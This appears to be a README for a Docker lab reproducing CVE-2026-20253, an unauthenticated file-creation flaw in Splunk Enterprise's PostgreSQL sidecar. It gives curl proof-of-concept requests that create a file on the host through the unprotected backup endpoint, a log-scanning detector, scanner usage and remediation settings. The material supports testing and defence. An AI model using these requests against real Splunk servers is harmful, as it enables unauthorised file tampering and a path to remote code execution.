## https://sploitus.com/exploit?id=EA243E1F-DDE9-5EB3-8E35-B0B053C11F4E
# CVE-2026-20253: Splunk Enterprise Pre-Auth RCE Lab
> **Unauthenticated Arbitrary File Creation and Truncation via PostgreSQL Sidecar**
> CVSS 9.8 · Critical · CWE-306 · Actively exploited (CISA KEV)
---
## ⚠️ Disclaimer
This repository is intended **strictly for educational and authorised security research purposes**.
All testing must be performed against infrastructure you own or have explicit written permission to test.
The authors accept no liability for misuse of the techniques or tooling demonstrated here.
**Never run this against production systems or environments you do not own.**
---
## Overview
CVE-2026-20253 affects Splunk Enterprise versions below **10.2.4** and **10.0.7**.
The PostgreSQL sidecar service bundled with Splunk exposes two internal HTTP endpoints:
```
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore
```
Both endpoints **lack any authentication check (CWE-306)**, so any network-reachable attacker can invoke them without credentials. By supplying an attacker-controlled `backupFile` parameter, an unauthenticated user can create or truncate arbitrary files on the Splunk host filesystem, a primitive that researchers have chained into full pre-authentication Remote Code Execution.
| Property | Detail |
|-----------------|---------------------------------------------|
| CVE | CVE-2026-20253 |
| CVSS Score | 9.8 (Critical) |
| CWE | CWE-306, Missing Authentication for Critical Function |
| Affected | Splunk Enterprise 10.2.x below 10.2.4 and 10.0.x below 10.0.7 |

Both containers can run side-by-side; ports are offset to avoid conflicts.
---
## Testing
### Test vulnerable instance (expect HTTP 400)
```bash
curl -sk -X POST "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup" -H "Authorization: Basic cHNzZWM6Cg==" -d '{"database":"postgres","backupFile":"/tmp/poc"}' -o /dev/null -w "HTTP Status: %{http_code}\n"
```
**Expected: `400`.** The endpoint exists, no authentication was enforced and the request was processed.
Verify the file was created inside the container:
```bash
docker exec splunk-cve-2026-20253 ls -la /tmp/poc
```
---
### Test patched instance (expect HTTP 401)
```bash
curl -sk -X POST "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup" -H "Authorization: Basic cHNzZWM6Cg==" -d '{"database":"postgres","backupFile":"/tmp/poc"}' -o /dev/null -w "HTTP Status: %{http_code}\n"
```
**Expected: `401`.** Authentication is now enforced and the request is rejected.
---
### Response code reference
| HTTP Status | Meaning |
|-------------|----------------------------------------------|
| `400` | **Vulnerable**: endpoint hit, no auth check |
| `401` | **Patched**: authentication enforced |
| `404` | Sidecar not present / wrong path |
| `000` | Container not ready yet |
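As an added defensive example (not part of this lab repository or the watchTowr tool), the following script flags requests to the two sidecar recovery endpoints in web access logs and labels each hit using the status-code meanings from the table above. It assumes Combined Log Format lines from a reverse proxy in front of splunkweb; the sample lines are constructed.

```python
import re
from dataclasses import dataclass

# Endpoint paths named in the advisory. The lab's curl commands reach them through
# splunkweb under /en-US/splunkd/__raw, so we match on the path suffix.
SIDECAR_ENDPOINTS = ("/v1/postgres/recovery/backup", "/v1/postgres/recovery/restore")

# Same meaning as the response code reference table above.
VERDICTS = {
    400: "processed without auth: sidecar exposed, check the host for created/truncated files",
    401: "rejected: authentication enforced",
    404: "sidecar absent or wrong path",
}

# Assumption: Combined Log Format lines from a reverse proxy in front of splunkweb.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

@dataclass
class Hit:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    verdict: str

def scan(lines):
    # Return one Hit per request that reached a sidecar recovery endpoint.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or unrelated line: skip rather than crash
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if path.endswith(SIDECAR_ENDPOINTS):
            status = int(m["status"])
            hits.append(Hit(m["ip"], m["ts"], m["method"], path, status,
                            VERDICTS.get(status, "other")))
    return hits

# Constructed sample lines (not real traffic); addresses are from RFC 5737 test ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2026:14:02:11 +0000] "POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1" 400 0 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Jun/2026:14:02:12 +0000] "POST /en-US/splunkd/__raw/v1/postgres/recovery/restore HTTP/1.1" 400 0 "-" "curl/8.5.0"',
    '198.51.100.4 - - [10/Jun/2026:14:05:40 +0000] "GET /en-US/app/search/search HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Jun/2026:14:07:03 +0000] "POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1" 401 0 "-" "python-requests/2.32"',
    'garbage line that does not parse',
]
```

Running `scan(SAMPLE_LOG)` yields three hits: two 400s from the same source (the instance accepted the unauthenticated requests) and one 401 where authentication held.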
---
### Optional: watchTowr scanner
The watchTowr Labs team published a detection script that automates the above check:
```bash
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000
```
---
## Stopping the lab
```bash
# Stop vulnerable
docker compose -f docker-compose.yml down
# Stop patched
docker compose -f patched-docker-compose.yml down
```
---
## Remediation
Update to a fixed version immediately:
| Branch | Fixed Version |
|--------|--------------|
| 10.2.x | **10.2.4** |
| 10.0.x | **10.0.7** |
If you cannot patch immediately, disable the PostgreSQL sidecar by adding the following to `server.conf` and restarting Splunk:
```ini
[postgres]
disabled = true
```
> ⚠️ Do not disable the sidecar if you are running Edge Processor or SPL2 data pipelines; it is required for those features.
---
## References
- **Splunk Official Advisory**: [SVD-2026-0603](https://advisory.splunk.com/advisories/SVD-2026-0603)
- **watchTowr Labs Research & Detection Tool**: [github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253](https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253/)
- **CISA KEV Entry**: [cisa.gov/known-exploited-vulnerabilities-catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- **The Hacker News Write-up**: [Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication](https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html)
---
## Legal
This lab environment is provided for **defensive security research and education only**.
Unauthorised access to computer systems is illegal under the Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and equivalent legislation worldwide.
Use responsibly.